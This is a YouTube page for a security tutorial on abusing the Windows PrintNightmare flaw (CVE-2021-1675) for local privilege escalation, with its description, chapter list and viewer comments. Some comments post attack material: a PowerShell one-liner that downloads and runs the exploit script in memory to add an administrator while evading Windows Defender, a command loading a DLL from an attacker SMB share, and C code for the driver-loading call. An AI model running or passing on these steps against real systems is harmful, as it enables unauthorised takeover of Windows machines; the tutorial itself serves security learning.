Abusing PrintNightmare (CVE-2021-1675) - Local Privilege Escalation

  • Published 18 Jun 2024
  • The exploit abuses the Print Spooler in Windows to load malicious DLL files. This video shows how this exploit is being used as a local privilege escalation, along with how to mitigate against these attacks. Check out the next video to see how this same vulnerability can be used for Remote Code Execution against a Domain Controller.
    Disclaimer: This content is intended to be consumed by cyber security professionals, ethical hackers, and penetration testers. Any attacks performed in this video should only be performed in environments that you control or have explicit permission to perform them on.
    Please consider sharing with a friend, hitting the like button, and subscribing!
    Github Resources mentioned in this video:
    github.com/calebstewart/CVE-2...
    github.com/cube0x0/CVE-2021-1675
    Part Two:
    • Abusing PrintNightmare...
    👇 SUBSCRIBE TO INFINITELOGINS UA-cam CHANNEL NOW 👇
    ua-cam.com/users/infinitelog...
    00:00 - Intro
    00:50 - Exploits on Github
    02:50 - Reviewing Environment
    05:40 - Running Exploit
    10:00 - Mitigation
    ___________________________________________
    Social Media:
    Website: infinitelogins.com/
    Twitter: / infinitelogins
    Twitch: / infinitelogins
    ___________________________________________
    Donations and Support:
    Like my content? Please consider supporting me on Patreon:
    / infinitelogins
    Purchase a VPN Using my Affiliate Link
    www.privateinternetaccess.com...
    ___________________________________________
    #CVE #PrintNightmare #WindowsVulnerablility

COMMENTS • 24

  • @InfiniteLogins
    @InfiniteLogins  2 years ago +3

    Part 2, showing Remote Code Execution against a Domain Controller, will be available today at 2 PM PDT - check the link in the description!

  • @wowleague6779
    @wowleague6779 2 years ago +4

    Best explanation so far

  • @Dexterlex
    @Dexterlex 2 years ago

    One thing I would like to see on your channel is AV evasion and stuff like that. Anyway, it's great to watch your videos.

    • @InfiniteLogins
      @InfiniteLogins  2 years ago +1

      Thanks! AV evasion is a tough one since it changes so much - and definitely not my strong suit. I'll share it as soon as I learn more about it!

    • @Dexterlex
      @Dexterlex 2 years ago

      @@InfiniteLogins Yeah sure thanks for looking into it. Hoping to see soon

  • @ARZ10198
    @ARZ10198 2 years ago +1

    Nice explanation. Can the next video be about Kerberos delegations?

  • @johnsnow1062
    @johnsnow1062 2 years ago

    cool

  • @JSONSEC
    @JSONSEC 2 years ago +1

    This isn't going to have any problems with UA-cam censorship =p.
    Thanks for the videos tho, been searching around for the powershell script for this

    • @InfiniteLogins
      @InfiniteLogins  2 years ago +2

      Shouldn't. Nothing malicious about this and I have others on the channel just like it.

    • @jasonford2877
      @jasonford2877 2 years ago

      🤞

  • @bgrassguitarpicker
    @bgrassguitarpicker 2 years ago

    When you run the script, do you have the "Point and Print" GPO enabled? Thank you

  • @bathtoaster335
    @bathtoaster335 A month ago

    Hi mate, been trying to do this for a uni assignment, and I have been getting some errors trying this on Windows 7, could you please recommend a link or method to get an ISO for the Win10 virtual machine like yours, and also any set up or adjustments that need to be made? Thank you heaps

  • @kientran9766
    @kientran9766 2 years ago

    When I tried to connect with user victim and password victim, it worked. However, when I tried to connect with a user that doesn't use a password, it didn't work. The command used:
    Python3 CVE........ domain/user:@ip victim '\\ipattacker\smb\*.dll
    ..... now, I can't connect if the victim doesn't have a password.

  • @nexsploit4444
    @nexsploit4444 2 years ago +1

    Note - copying and pasting the actual script and writing it to disk will get picked up by AV (Windows Defender), so keep it in memory and do this instead so that it doesn't get picked up:
    iex(iwr raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 -UseBasicParsing); Invoke-Nightmare -NewUser "User1" -NewPassword "password123" -DriverName "PrintMe"
    :) hope that helps

    • @nexsploit4444
      @nexsploit4444 2 years ago +2

      put this here cause i was testing it along with the video and noticed Defender didn't like that lol ;)

    • @InfiniteLogins
      @InfiniteLogins  2 years ago +3

      Thanks!

    • @nexsploit4444
      @nexsploit4444 2 years ago +1

      @@InfiniteLogins npnp!

  • @bugsysiegals
    @bugsysiegals 2 years ago

    Is this really your typing speed? How many words per minute are you typing? LOL

  • @bugsysiegals
    @bugsysiegals 2 years ago

    While PS seems like a good idea, avoiding Linux, you'd be leaving footprints with PS history ... this doesn't seem ideal to me ...

  • @sbypasser819
    @sbypasser819 2 years ago

    Everyone says it works on all versions of Windows, BUT IT DOESN'T WORK ON WINDOWS 7!
    This:
    DRIVER_INFO_2W di = {};
    di.cVersion = 3;
    di.pName = (LPWSTR)L"1111";
    di.pEnvironment = (LPWSTR)L"Windows x64";
    di.pDataFile = (LPWSTR)DLL_PATH;
    di.pConfigFile = (LPWSTR)DLL_PATH;
    di.pDriverPath = (LPWSTR)L"C:\\Test\\UNIDRV.DLL";
    AddPrinterDriverExW(0, 2, (PBYTE)&di, 0);
    This gives error 5 on Win7; on Win10 before 21H2 it works.